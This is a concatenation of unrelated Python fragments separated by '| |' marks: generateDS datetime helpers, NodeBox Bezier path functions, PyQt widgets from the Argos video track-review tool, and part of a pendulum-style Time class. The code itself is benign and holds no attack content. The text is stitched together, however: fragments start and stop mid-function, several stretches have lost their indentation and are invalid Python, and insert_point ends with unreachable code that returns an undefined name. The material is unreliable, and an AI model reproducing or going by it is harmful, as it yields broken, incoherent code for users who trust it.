                    # Fractional seconds without the leading '0.'.
                    ('%f' % (float(input_data.microsecond) / 1000000))[2:],
                )
            if input_data.tzinfo is not None:
                tzoff = input_data.tzinfo.utcoffset(input_data)
                if tzoff is not None:
                    total_seconds = tzoff.seconds + (86400 * tzoff.days)
                    if total_seconds == 0:
                        # UTC is rendered as 'Z' rather than '+00:00'.
                        _svalue += 'Z'
                    else:
                        if total_seconds < 0:
                            _svalue += '-'
                            total_seconds *= -1
                        else:
                            _svalue += '+'
                        hours = total_seconds // 3600
                        minutes = (total_seconds - (hours * 3600)) // 60
                        _svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
            return _svalue
        @classmethod
        def gds_parse_datetime(cls, input_data):
            """Parse an xsd:dateTime string, honoring a trailing 'Z' or
            '+hh:mm'/'-hh:mm' offset, into a datetime (aware when an
            offset was present, otherwise naive)."""
            tz = None
            if input_data[-1] == 'Z':
                tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
                input_data = input_data[:-1]
            else:
                results = GeneratedsSuper.tzoff_pattern.search(input_data)
                if results is not None:
                    tzoff_parts = results.group(2).split(':')
                    tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
                    if results.group(1) == '-':
                        tzoff *= -1
                    tz = GeneratedsSuper._FixedOffsetTZ(
                        tzoff, results.group(0))
                    input_data = input_data[:-6]
            time_parts = input_data.split('.')
            if len(time_parts) > 1:
                # Normalize fractional seconds to exactly six digits so
                # strptime's %f accepts them.
                micro_seconds = int(float('0.' + time_parts[1]) * 1000000)
                input_data = '%s.%s' % (
                    time_parts[0], "{}".format(micro_seconds).rjust(6, "0"), )
                dt = datetime_.datetime.strptime(
                    input_data, '%Y-%m-%dT%H:%M:%S.%f')
            else:
                dt = datetime_.datetime.strptime(
                    input_data, '%Y-%m-%dT%H:%M:%S')
            dt = dt.replace(tzinfo=tz)
            return dt
        def gds_validate_date(self, input_data, node=None, input_name=''):
            """Return the value unchanged; no validation performed."""
            return input_data
def gds_format_date(self, input_data, input_name=''):
_svalue = '%04d-%02d-%02d' % (
input_data.year,
input_data.month,
input_data.day,
)
try:
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
| |
- start
d = n
if amount > 1:
# The delta value is divided by amount-1, because we also want the last point (t=1.0)
# If we don't use amount-1, we fall one point short of the end.
# If amount=4, we want the point at t 0.0, 0.33, 0.66 and 1.0.
# If amount=2, we want the point at t 0.0 and 1.0.
d = float(n) / (amount-1)
for i in xrange(amount):
yield point(path, start+d*i, segments)
#--- BEZIER PATH CONTOURS ----------------------------------------------------------------------------
def contours(path):
    """ Returns a list of contours in the path, as BezierPath objects.
    A contour is a sequence of lines and curves separated from the next contour by a MOVETO.
    For example, the glyph "o" has two contours: the inner circle and the outer circle.
    """
    found = []
    contour = None
    has_segments = False
    for pt in path:
        cmd = pt.cmd
        if cmd == MOVETO:
            # A MOVETO starts a new contour; keep the previous one only
            # if it actually contained lines or curves.
            if has_segments:
                found.append(contour)
            contour = BezierPath()
            contour.moveto(pt.x, pt.y)
            has_segments = False
        elif cmd == LINETO:
            has_segments = True
            contour.lineto(pt.x, pt.y)
        elif cmd == CURVETO:
            has_segments = True
            contour.curveto(pt.ctrl1.x, pt.ctrl1.y, pt.ctrl2.x, pt.ctrl2.y, pt.x, pt.y)
        elif cmd == CLOSE:
            contour.closepath()
    if has_segments:
        found.append(contour)
    return found
#--- BEZIER PATH FROM POINTS -------------------------------------------------------------------------
def findpath(points, curvature=1.0):
    """ Constructs a smooth BezierPath from the given list of points.
    The curvature parameter offers some control on how separate segments are stitched together:
    from straight angles to smooth curves.
    Curvature is only useful if the path has more than three points.
    """
    # The list of points consists of Point objects,
    # but it shouldn't crash on something as straightforward
    # as someone supplying a list of (x,y)-tuples.
    # NOTE: TupleType and list.reverse() on a range() result (below) make
    # this function Python 2 only, consistent with the rest of the module.
    from types import TupleType
    for i, pt in enumerate(points):
        if type(pt) == TupleType:
            points[i] = Point(pt[0], pt[1])
    # No points: return nothing.
    if len(points) == 0: return None
    # One point: return a path with a single MOVETO-point.
    if len(points) == 1:
        path = BezierPath(None)
        path.moveto(points[0].x, points[0].y)
        return path
    # Two points: path with a single straight line.
    if len(points) == 2:
        path = BezierPath(None)
        path.moveto(points[0].x, points[0].y)
        path.lineto(points[1].x, points[1].y)
        return path
    # Zero curvature means path with straight lines.
    curvature = max(0, min(1, curvature))
    if curvature == 0:
        path = BezierPath(None)
        path.moveto(points[0].x, points[0].y)
        # NOTE(review): the range starts at 0, so the first point is added
        # again as a lineto immediately after the moveto -- confirm intended.
        for i in range(len(points)):
            path.lineto(points[i].x, points[i].y)
        return path
    # Construct the path with curves.
    curvature = 4 + (1.0-curvature)*40
    # The first point's ctrl1 and ctrl2 and last point's ctrl2
    # will be the same as that point's location;
    # we cannot infer how the path curvature started or will continue.
    dx = {0: 0, len(points)-1: 0}
    dy = {0: 0, len(points)-1: 0}
    bi = {1: -0.25}
    ax = {1: (points[2].x-points[0].x-dx[0]) / 4}
    ay = {1: (points[2].y-points[0].y-dy[0]) / 4}
    # Forward sweep of the recurrence that determines the tangent offsets...
    for i in range(2, len(points)-1):
        bi[i] = -1 / (curvature + bi[i-1])
        ax[i] = -(points[i+1].x-points[i-1].x-ax[i-1]) * bi[i]
        ay[i] = -(points[i+1].y-points[i-1].y-ay[i-1]) * bi[i]
    # ...followed by back-substitution (Python 2: range() returns a list).
    r = range(1, len(points)-1)
    r.reverse()
    for i in r:
        dx[i] = ax[i] + dx[i+1] * bi[i]
        dy[i] = ay[i] + dy[i+1] * bi[i]
    path = BezierPath(None)
    path.moveto(points[0].x, points[0].y)
    for i in range(len(points)-1):
        path.curveto(points[i].x + dx[i],
                     points[i].y + dy[i],
                     points[i+1].x - dx[i+1],
                     points[i+1].y - dy[i+1],
                     points[i+1].x,
                     points[i+1].y)
    return path
#--- BEZIER PATH INSERT POINT ------------------------------------------------------------------------
def insert_point(path, t):
    """ Inserts an extra point at t.
    (Python 2 module: note the 'raise E, msg' syntax below.)
    """
    # Find the points before and after t on the path.
    i, t, closeto = _locate(path, t)
    x0 = path[i].x
    y0 = path[i].y
    p1 = path[i+1]
    p1cmd, x3, y3, x1, y1, x2, y2 = p1.cmd, p1.x, p1.y, p1.ctrl1.x, p1.ctrl1.y, p1.ctrl2.x, p1.ctrl2.y
    # Construct the new point at t.
    if p1cmd == CLOSE:
        pt_cmd = LINETO
        pt_x, pt_y = linepoint(t, x0, y0, closeto.x, closeto.y)
    elif p1cmd == LINETO:
        pt_cmd = LINETO
        pt_x, pt_y = linepoint(t, x0, y0, x3, y3)
    elif p1cmd == CURVETO:
        pt_cmd = CURVETO
        pt_x, pt_y, pt_c1x, pt_c1y, pt_c2x, pt_c2y, pt_h1x, pt_h1y, pt_h2x, pt_h2y = \
            curvepoint(t, x0, y0, x1, y1, x2, y2, x3, y3, True)
    else:
        raise PathError, "Locate should not return a MOVETO"
    # NodeBox for OpenGL modifies the path in place,
    # NodeBox for Mac OS X returned a path copy (see inactive code below).
    if pt_cmd == CURVETO:
        # Split the curve: rewrite the following element's handles, then
        # insert the new on-curve point with its own handles before it.
        path[i+1].ctrl1.x = pt_c2x
        path[i+1].ctrl1.y = pt_c2y
        path[i+1].ctrl2.x = pt_h2x
        path[i+1].ctrl2.y = pt_h2y
        path.insert(i+1, PathElement(cmd=CURVETO, pts=[(pt_h1x, pt_h1y), (pt_c1x, pt_c1y), (pt_x, pt_y)]))
    elif pt_cmd == LINETO:
        path.insert(i+1, PathElement(cmd=LINETO, pts=[(pt_x, pt_y)]))
    else:
        raise PathError, "Didn't expect pt_cmd %s here" % pt_cmd
    return path[i+1]
    # NOTE(review): everything below is unreachable (the function returns
    # above) and the final 'return new_path' references an undefined name;
    # it is the retired copy-based Mac OS X implementation kept for reference.
    #new_path = BezierPath(None)
    #new_path.moveto(path[0].x, path[0].y)
    #for j in range(1, len(path)):
    #    if j == i+1:
    #        if pt_cmd == CURVETO:
    #            new_path.curveto(pt_h1x, pt_h1y, pt_c1x, pt_c1y, pt_x, pt_y)
    #            new_path.curveto(pt_c2x, pt_c2y, pt_h2x, pt_h2y, path[j].x, path[j].y)
    #        elif pt_cmd == LINETO:
    #            new_path.lineto(pt_x, pt_y)
    #            if path[j].cmd != CLOSE:
    #                new_path.lineto(path[j].x, path[j].y)
    #            else:
    #                new_path.closepath()
    #        else:
    #            raise PathError, "Didn't expect pt_cmd %s here" % pt_cmd
    #    else:
    #        if path[j].cmd == MOVETO:
    #            new_path.moveto(path[j].x, path[j].y)
    #        if path[j].cmd == LINETO:
    #            new_path.lineto(path[j].x, path[j].y)
    #        if path[j].cmd == CURVETO:
    #            new_path.curveto(path[j].ctrl1.x, path[j].ctrl1.y,
    #                         path[j].ctrl2.x, path[j].ctrl2.y,
    #                         path[j].x, path[j].y)
    #        if path[j].cmd == CLOSE:
    #            new_path.closepath()
    return new_path
#=====================================================================================================
#--- BEZIER ARC --------------------------------------------------------------------------------------
# Copyright (c) 2005-2008, Enthought, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# Neither the name of Enthought, Inc. nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from math import acos, sin, cos, hypot, ceil, sqrt, radians, degrees
def arc(x1, y1, x2, y2, angle=0, extent=90):
""" Compute a cubic Bezier approximation of an elliptical arc.
(x1, y1) and (x2, y2) are the corners of the enclosing rectangle.
The coordinate system has coordinates that increase to the right and down.
Angles, measured in degrees, start with 0 to the right (the positive X axis)
and increase counter-clockwise.
The arc extends from angle to angle+extent.
    I.e. angle=0 and extent=180 yields an upside-down semi-circle.
The resulting coordinates are of the form (x1,y1, x2,y2, x3,y3, x4,y4)
such that the curve goes from (x1, y1) to (x4, y4)
with (x2, y2) and (x3, y3) as their respective Bezier control points.
"""
x1, y1, x2, y2 = min(x1,x2), max(y1,y2), max(x1,x2), min(y1,y2)
extent = min(max(extent, -360), 360)
n = abs(extent) <= 90 and 1 or int(ceil(abs(extent) / 90.0))
a = float(extent) / n
cx = float(x1 + x2) / 2
cy = float(y1 + y2) / 2
rx = float(x2 - x1) / 2
ry = float(y2 - y1) / 2
a2 = radians(a) / 2
kappa = abs(4.0 / 3 * (1 - cos(a2)) / sin(a2))
points = []
for i in range(n):
theta0 = radians(angle + (i+0) * a)
theta1 = radians(angle + (i+1) * a)
c0, c1 | |
'code', 'old', 'new'])
for change in self.changeList:
if change.frame not in self.undone_changes:
writer.writerow(
[
change.frame,
change.end,
change.change.name,
change.change.value,
change.orig,
change.new,
]
)
    @qc.pyqtSlot(str)
    def loadChangeList(self, fname: str) -> None:
        """Replace the current change list with rows read from CSV *fname*.

        Expects columns named frame, end, change, orig, and new; an empty
        'new' field becomes None.  Emits sigChangeList when done.

        NOTE(review): the writer above emits header names 'code'/'old'
        while this reader indexes 'change'/'orig' -- confirm that files
        written by saveChangeList can actually be re-loaded here.
        """
        self.changeList.clear()
        with open(fname) as fd:
            reader = csv.DictReader(fd)
            idx = 0
            for row in reader:
                # Empty 'new' column means the change has no target id.
                new = int(row['new']) if len(row['new']) > 0 else None
                # Look the change code up by its symbolic name.
                chcode = getattr(ChangeCode, row['change'])
                change = Change(
                    frame=int(row['frame']),
                    end=int(row['end']),
                    change=chcode,
                    orig=int(row['orig']),
                    new=new,
                    idx=idx,
                )
                self.changeList.add(change)
                idx += 1
        self.sigChangeList.emit(self.changeList)
class ReviewScene(FrameScene):
    """FrameScene specialization for the review tool.

    Adds drawing of a track's positional history (as line segments or
    ellipses, age-colored via a colormap) and age-based fading/dashing of
    bounding boxes carried over from earlier frames.
    """
    def __init__(self, *args, **kwargs):
        super(ReviewScene, self).__init__(*args, **kwargs)
        self.drawingDisabled = True
        self.lineStyleOldTrack = qc.Qt.DashLine
        # Number of frames over which old-track boxes fade out.
        self.histGradient = 1
        # Graphics items currently showing a track's history.
        self.trackHist = []
        self.markerThickness = settings.value(
            'review/marker_thickness', 2.0, type=float
        )
        self.pathDia = settings.value('review/path_diameter', 5)
        self.trackStyle = '-' # `-` for line, `o` for ellipse
        # TODO implement choice of the style
    @qc.pyqtSlot(int)
    def setHistGradient(self, age: int) -> None:
        """Set the number of frames over which old boxes fade."""
        self.histGradient = age
    @qc.pyqtSlot(float)
    def setTrackMarkerThickness(self, thickness: float) -> None:
        """Set the thickness of the marker-edge for drawing paths"""
        self.markerThickness = thickness
        settings.setValue('review/marker_thickness', thickness)
    @qc.pyqtSlot(np.ndarray, str)
    def showTrackHist(self, track: np.ndarray, cmap: str) -> None:
        """Draw the position history in *track*, colored by age via *cmap*."""
        for item in self.trackHist:
            try:
                self.removeItem(item)
            except Exception as e:
                # The item may already have been removed with the scene.
                logging.debug(f'{e}')
                pass
        self.trackHist = []
        if self._frame is None:
            return
        # One pen per history position, colored by its index in the track.
        colors = [
            qg.QColor(*get_cmap_color(ii, len(track), cmap))
            for ii in range(len(track))
        ]
        pens = [
            qg.QPen(qg.QBrush(color), self.markerThickness) for color in colors
        ]
        if self.trackStyle == '-':
            # Connect successive positions with line segments.
            self.trackHist = [
                self.addLine(
                    track[ii - 1][0],
                    track[ii - 1][1],
                    track[ii][0],
                    track[ii][1],
                    pens[ii],
                )
                for ii in range(1, len(track))
            ]
        elif self.trackStyle == 'o':
            # Mark each position with an ellipse of diameter pathDia.
            self.trackHist = [
                self.addEllipse(
                    track[ii][0],
                    track[ii][1],
                    self.pathDia,
                    self.pathDia,
                    pens[ii],
                )
                for ii in range(len(track))
            ]
    @qc.pyqtSlot(float)
    def setPathDia(self, val):
        # Diameter of the ellipse markers used when trackStyle is 'o'.
        self.pathDia = val
    @qc.pyqtSlot(dict)
    def setRectangles(self, rects: Dict[int, np.ndarray]) -> None:
        """rects: a dict of id: (x, y, w, h, frame)
        This overrides the same slot in FrameScene where each rectangle has
        a fifth entry indicating frame no of the rectangle.
        The ones from earlier frame that are not present in the current frame
        are displayed with a special line style (default: dashes)
        """
        logging.debug(
            f'{self.objectName()} Received rectangles from {self.sender().objectName()}'
        )
        logging.debug(f'{self.objectName()} Rectangles: {rects}')
        logging.debug(f'{self.objectName()} cleared')
        self.clearItems()
        # Base class draws the plain (x, y, w, h) rectangles.
        tmpRects = {id_: rect[:4] for id_, rect in rects.items()}
        super(ReviewScene, self).setRectangles(tmpRects)
        for id_, tdata in rects.items():
            if tdata.shape[0] != 5:
                raise ValueError(f'Incorrectly sized entry: {id_}: {tdata}')
            item = self.itemDict[id_]
            label = self.labelDict[id_]
            if tdata[4] < self.frameno:
                # Rectangle comes from an earlier frame: fade it linearly
                # with age up to histGradient frames (floor at 10% opacity)
                # and switch to the old-track line style.
                alpha = int(
                    255
                    * (
                        1
                        - 0.9
                        * min(
                            np.abs(self.frameno - tdata[4]), self.histGradient
                        )
                        / self.histGradient
                    )
                )
                pen = item.pen()
                color = pen.color()
                color.setAlpha(alpha)
                pen.setColor(color)
                pen.setStyle(self.lineStyleOldTrack)
                item.setPen(pen)
                label.setDefaultTextColor(color)
                label.setFont(self.font)
                label.adjustSize()
        self.update()
    def clearAll(self):
        # Full reset: also drop cached history items and the selection.
        super(ReviewScene, self).clearAll()
        self.trackHist = []
        self.selected = []
class TrackView(FrameView):
    """Visualization of bboxes of objects on video frame with facility to set
    visible area of scene"""
    sigSelected = qc.pyqtSignal(list)
    sigTrackDia = qc.pyqtSignal(float)
    sigTrackMarkerThickness = qc.pyqtSignal(float)
    def __init__(self, *args, **kwargs):
        super(TrackView, self).__init__(*args, **kwargs)
        # NOTE(review): self.scene() and self.frameScene are presumably the
        # same ReviewScene created in _makeScene (invoked by the base-class
        # __init__) -- confirm; the two spellings are used interchangeably.
        self.sigSelected.connect(self.scene().setSelected)
        self.sigTrackDia.connect(self.scene().setPathDia)
        self.sigTrackMarkerThickness.connect(
            self.frameScene.setTrackMarkerThickness
        )
    def setViewportRect(self, rect: qc.QRectF) -> None:
        """Zoom/pan the view so *rect* (scene coordinates) is visible."""
        self.fitInView(
            rect.x(),
            rect.y(),
            rect.width(),
            rect.height(),
            qc.Qt.KeepAspectRatio,
        )
    def _makeScene(self):
        # Use the review-specific scene instead of the base FrameScene.
        self.frameScene = ReviewScene()
        self.setScene(self.frameScene)
    @qc.pyqtSlot()
    def setPathDia(self):
        """Ask the user for the path-marker diameter and broadcast it."""
        input_, accept = qw.QInputDialog.getDouble(
            self,
            'Diameter of path markers',
            'pixels',
            self.frameScene.pathDia,
            min=0,
            max=500,
        )
        if accept:
            self.sigTrackDia.emit(input_)
    @qc.pyqtSlot()
    def setTrackMarkerThickness(self):
        """Ask the user for the path-marker thickness and broadcast it."""
        input_, accept = qw.QInputDialog.getDouble(
            self,
            'Thickness of path markers',
            'pixels',
            self.frameScene.markerThickness,
            min=0,
            max=500,
        )
        if accept:
            self.sigTrackMarkerThickness.emit(input_)
    @qc.pyqtSlot(bool)
    def enableDraw(self, enable: bool):
        """Activate arena drawing"""
        self.frameScene.disableDrawing(not enable)
class TrackList(qw.QListWidget):
    """
    Attributes
    ----------
    keepSelection: bool
        Whether to maintain selection of list item across frames. When the path
        of the selected item is drawn, this makes things VERY SLOW.
    selected: list of int
        IDs of selected objects (in Review tool only a single selection is
        allowed).
    """
    # Map tracks: source-id, target-id, end-frame, swap
    sigMapTracks = qc.pyqtSignal(int, int, int, bool)
    sigSelected = qc.pyqtSignal(list)
    def __init__(self, *args, **kwargs):
        super(TrackList, self).__init__(*args, **kwargs)
        # Which mouse button drives the current drag (left=assign, right=swap).
        self._drag_button = qc.Qt.NoButton
        self.setSelectionMode(qw.QAbstractItemView.SingleSelection)
        self.itemSelectionChanged.connect(self.sendSelected)
        self.itemClicked.connect(self.sendSelected)
        self.keepSelection = settings.value('review/keepselection', type=bool)
        self.currentFrame = -1
        self.selected = []
    @qc.pyqtSlot(int)
    def setCurrentFrame(self, val):
        # Remembered so drops can default their frame range to "now".
        self.currentFrame = val
    @qc.pyqtSlot(bool)
    def setKeepSelection(self, val):
        # Persist the preference across sessions.
        self.keepSelection = val
        settings.setValue('review/keepselection', val)
    def decode_item_data(
        self, mime_data: qc.QMimeData
    ) -> List[Dict[qc.Qt.ItemDataRole, qc.QVariant]]:
        """This was a test trick found here:
        https://wiki.python.org/moin/PyQt/Handling%20Qt%27s%20internal%20item%20MIME%20type
        but a much simpler solution for my case was here:
        https://stackoverflow.com/questions/9715171/how-to-drop-items-on-qlistwidget-between-some-items
        """
        data = mime_data.data('application/x-qabstractitemmodeldatalist')
        ds = qc.QDataStream(data)
        item = {}
        item_list = []
        # NOTE(review): `item` is created once and appended repeatedly, so
        # item_list holds references to one shared dict that keeps being
        # overwritten.  Looks unintended, but per the docstring this was
        # exploratory code (see the unused call site in dropEvent below).
        while not ds.atEnd():
            ds.readInt32() # row
            ds.readInt32() # col
            map_items = ds.readInt32()
            for ii in range(map_items):
                key = ds.readInt32()
                value = qc.QVariant()
                ds >> value
                item[qc.Qt.ItemDataRole(key)] = value
            item_list.append(item)
        return item_list
    def dragMoveEvent(self, e: qg.QDragMoveEvent) -> None:
        """This is just for tracking left vs right mouse button drag"""
        self._drag_button = e.mouseButtons()
        super(TrackList, self).dragMoveEvent(e)
    def dropEvent(self, event: qg.QDropEvent) -> None:
        """If dragged with left button, assign dropped trackid to the target
        trackid, if right button, swap the two. If Shift key was
        pressed, then apply these only for the current frame,
        otherwise also all future frames.
        """
        # items = self.decode_item_data(event.mimeData())
        # assert len(items) == 1, 'Only allowed to drop a single item'
        # item = items[0]
        # logging.debug(f'data: {item[qc.Qt.DisplayRole].value()}')
        # If dragged with left button, rename. if right button, swap
        source = event.source().currentItem()
        target = self.itemAt(event.pos())
        if target is None:
            event.ignore()
            return
        # endFrame == -1 means "apply to all future frames".
        endFrame = -1
        if qw.QApplication.keyboardModifiers() == qc.Qt.AltModifier:
            # Alt: let the user pick an explicit end frame.
            endFrame, accept = qw.QInputDialog.getInt(
                self,
                'Frame range',
                'Apply till frame',
                self.currentFrame,
                self.currentFrame,
                2 ** 31 - 1,
            )
            if not accept:
                endFrame = -1
        elif qw.QApplication.keyboardModifiers() == qc.Qt.ShiftModifier:
            # Shift: apply only to the current frame.
            endFrame = self.currentFrame
        self.sigMapTracks.emit(
            int(source.text()),
            int(target.text()),
            endFrame,
            self._drag_button == qc.Qt.RightButton,
        )
        # Presumably ignore() prevents the default item move; the mapping
        # signal above does the real work -- confirm.
        event.ignore()
    @qc.pyqtSlot(list)
    def replaceAll(self, track_list: List[int]):
        """Replace all items with keys from new tracks dictionary"""
        self.blockSignals(True)
        self.clear()
        sorted_tracks = sorted(track_list)
        self.addItems([str(x) for x in sorted_tracks])
        # print(self, 'keep selection', self.keepSelection, 'selected:', self.selected)
        if self.keepSelection and len(self.selected) > 0:
            # Re-select the previously selected id if it still exists;
            # signals stay blocked so no re-selection event is emitted.
            try:
                idx = sorted_tracks.index(self.selected[0])
                self.setCurrentRow(idx)
            except ValueError:
                pass
            self.blockSignals(False)
            # self.sigSelected.emit(self.selected)
            return
        self.blockSignals(False)
        # print('Updating selection')
        self.sendSelected()
    @qc.pyqtSlot()
    def sendSelected(self):
        """Intermediate slot to convert text labels into integer track ids"""
        self.selected = [int(item.text()) for item in self.selectedItems()]
        self.sigSelected.emit(self.selected)
        # Note: even if this is sent multiple times (e.g., both
        # itemSelectionChanged and itemClicked connected to this slot,
        # the destination FrameView keeps track of current selection and
        # ignores if the selection has not changed).
class LimitWin(qw.QMainWindow):
    """Top-level window that mirrors its close event on a signal.

    Emitting ``sigClose(False)`` on close lets a controlling, checkable
    QAction reset its checked state when the user dismisses the window.
    """

    sigClose = qc.pyqtSignal(bool)  # connected to action checked state

    def __init__(self, *args, **kwargs):
        super(LimitWin, self).__init__(*args, **kwargs)

    def closeEvent(self, a0: qg.QCloseEvent) -> None:
        # Notify listeners before the default close handling runs.
        self.sigClose.emit(False)
        super(LimitWin, self).closeEvent(a0)
class ChangeWindow(qw.QMainWindow):
    """Window showing the list of pending track changes in a table."""

    # Column headers: start frame, last frame the change applies to,
    # the kind of change, and the two track ids involved.
    cols = ['frame', 'end', 'change', 'old id', 'new id']

    def __init__(self):
        super(ChangeWindow, self).__init__()
        self.table = qw.QTableWidget()
        self.table.setColumnCount(len(self.cols))
        self.table.setHorizontalHeaderLabels(self.cols)
        self.table.setSizeAdjustPolicy(qw.QAbstractScrollArea.AdjustToContents)
        self.setWindowTitle('Argos: change list')
        header = self.table.horizontalHeader()
        for ii in range(len(self.cols)):
            # Size every column to its contents instead of stretching.
            header.setSectionResizeMode(ii, qw.QHeaderView.ResizeToContents)
        self.setCentralWidget(self.table)

    @qc.pyqtSlot(SortedKeyList)
    def setChangeList(self, change_list):
        """Replace the table contents with the entries of ``change_list``.

        Each entry is expected to carry ``frame``, ``end``, ``change``,
        ``orig`` and ``new`` attributes; ``change`` is mapped to a human
        readable label via the module-level ``change_name`` mapping.
        """
        self.table.clearContents()
        self.table.setRowCount(len(change_list))
        for ii, change in enumerate(change_list):
            self.table.setItem(ii, 0, qw.QTableWidgetItem(str(change.frame)))
            self.table.setItem(ii, 1, qw.QTableWidgetItem(str(change.end)))
            self.table.setItem(
                ii, 2, qw.QTableWidgetItem(change_name[change.change])
            )
            self.table.setItem(ii, 3, qw.QTableWidgetItem(str(change.orig)))
            self.table.setItem(ii, 4, qw.QTableWidgetItem(str(change.new)))
        self.table.resizeColumnsToContents()
class ReviewWidget(qw.QWidget):
"""A widget with two panes for reviewing track mislabelings"""
sigNextFrame = qc.pyqtSignal()
sigGotoFrame = qc.pyqtSignal(int)
sigLeftFrame = qc.pyqtSignal(np.ndarray, int)
sigRightFrame = qc.pyqtSignal(np.ndarray, int)
sigLeftTracks = qc.pyqtSignal(dict)
sigLeftTrackList = qc.pyqtSignal(
list
) # to separate tracks displayed on frame from those in list widget
sigRightTracks = qc.pyqtSignal(dict)
sigRightTrackList = qc.pyqtSignal(list)
sigAllTracksList = qc.pyqtSignal(list)
sigChangeTrack = qc.pyqtSignal(int, int, int)
sigSetColormap = qc.pyqtSignal(str, int)
sigDiffMessage = qc.pyqtSignal(str)
sigMousePosMessage = qc.pyqtSignal(str)
sigUndoCurrentChanges = qc.pyqtSignal(int)
sigDataFile = qc.pyqtSignal(str, bool)
sigProjectTrackHistLeft = qc.pyqtSignal(np.ndarray, str)
sigProjectTrackHistRight = qc.pyqtSignal(np.ndarray, str)
sigQuit = qc.pyqtSignal() # Pass on quit signal in a threadsafe way
def __init__(self, *args, **kwargs):
super(ReviewWidget, self).__init__(*args, **kwargs)
# Keep track of all the tracks seen so far
self.setObjectName('ReviewWidget')
self._wait_cond = threading.Event()
self.breakpoint = -1
self.entry_break = -1
self.exit_break = -1
self.jump_step = 10
self.history_length = 1
self.all_tracks = OrderedDict()
self.pathCmap = {
'left': settings.value('review/path_cmap_left', 'inferno'),
'right': settings.value('review/path_cmap_right', 'viridis'),
}
self.left_frame = None
self.right_frame = None
self.right_tracks = None
self.frame_no = -1
self.speed = 1.0
self.timer = qc.QTimer(self)
self.timer.setSingleShot(True)
self.video_reader = None
self.trackReader = None
self.track_filename = None
self.vid_info = VidInfo()
self.left_tracks = {}
self.right_tracks = {}
self.roi = None
# Since video seek is buggy, we have to do continuous reading
self.left_frame = None
self.right_frame = None
self.save_indicator = None
layout = qw.QVBoxLayout()
panes_layout = qw.QHBoxLayout()
self.leftView = TrackView()
self.leftView.setObjectName('LeftView')
self.leftView.frameScene.setObjectName('LeftScene')
# self.leftView.setSizePolicy(qw.QSizePolicy.MinimumExpanding, qw.QSizePolicy.MinimumExpanding)
self.leftView.setHorizontalScrollBarPolicy(qc.Qt.ScrollBarAlwaysOn)
self.leftView.setVerticalScrollBarPolicy(qc.Qt.ScrollBarAlwaysOn)
panes_layout.addWidget(self.leftView, 1)
max_list_width = 100
self.left_list = TrackList()
self.left_list.setObjectName('LeftList')
self.left_list.setMaximumWidth(max_list_width)
# | |
# -*- coding: utf-8 -*-
from datetime import time, datetime, timedelta
from .interval import Interval, AbsoluteInterval
from .mixins.default import TranslatableMixin, FormattableMixing, TestableMixin
from .constants import (
USECS_PER_SEC, SECS_PER_HOUR, SECS_PER_MIN
)
class Time(TranslatableMixin, FormattableMixing, TestableMixin, time):
"""
Represents a time instance as hour, minute, second, microsecond.
"""
def __init__(self, hour, minute=0, second=0, microsecond=0,
             tzinfo=None, fold=0):
    """
    Constructor.

    :param hour: The hour.
    :type hour: int

    :param minute: The minute.
    :type minute: int

    :param second: The second
    :type second: int

    :param microsecond: The microsecond
    :type microsecond: int

    :param tzinfo: The timezone info (not used)
    :type tzinfo: tzinfo or None

    :param fold: Disambiguation flag for repeated wall times (PEP 495).
    :type fold: int
    """
    # Mirror the components as private attributes; the read-only
    # properties below expose them.
    self._hour = hour
    self._minute = minute
    self._second = second
    self._microsecond = microsecond
    self._tzinfo = tzinfo
    # Plain datetime.time used for hashing and ISO formatting.
    self._time = time(hour, minute, second, microsecond, tzinfo)
    self._fold = fold
@classmethod
def instance(cls, t, copy=True):
    """
    Build a Time from a ``datetime.time`` object.

    :param t: The time object to convert.
    :type t: time

    :param copy: If False and ``t`` already is a Time, return it as-is.
    :type copy: bool

    :rtype: Time
    """
    if not copy and isinstance(t, Time):
        return t

    return cls(t.hour, t.minute, t.second, t.microsecond, t.tzinfo)

@classmethod
def now(cls, with_microseconds=True):
    """
    Return a Time for the current local time.

    Honours a test instance installed via ``set_test_now``. Microseconds
    are included unless ``with_microseconds`` is False.

    :param with_microseconds: Whether to include microseconds or not.
    :type with_microseconds: bool

    :rtype: Time
    """
    if cls.has_test_now():
        mocked = cls.get_test_now()
        if with_microseconds:
            return mocked
        return mocked.replace(microsecond=0)

    current = datetime.now()
    if with_microseconds:
        return cls(current.hour, current.minute, current.second,
                   current.microsecond)
    return cls(current.hour, current.minute, current.second, 0)
@property
def hour(self):
    # Hour component (0-23).
    return self._hour

@property
def minute(self):
    # Minute component (0-59).
    return self._minute

@property
def second(self):
    # Second component (0-59).
    return self._second

@property
def microsecond(self):
    # Microsecond component (0-999999).
    return self._microsecond

@property
def tzinfo(self):
    # Timezone info; kept for datetime.time compatibility, not used.
    return self._tzinfo

@property
def fold(self):
    # PEP 495 disambiguation flag.
    return self._fold
# Comparisons

def between(self, dt1, dt2, equal=True):
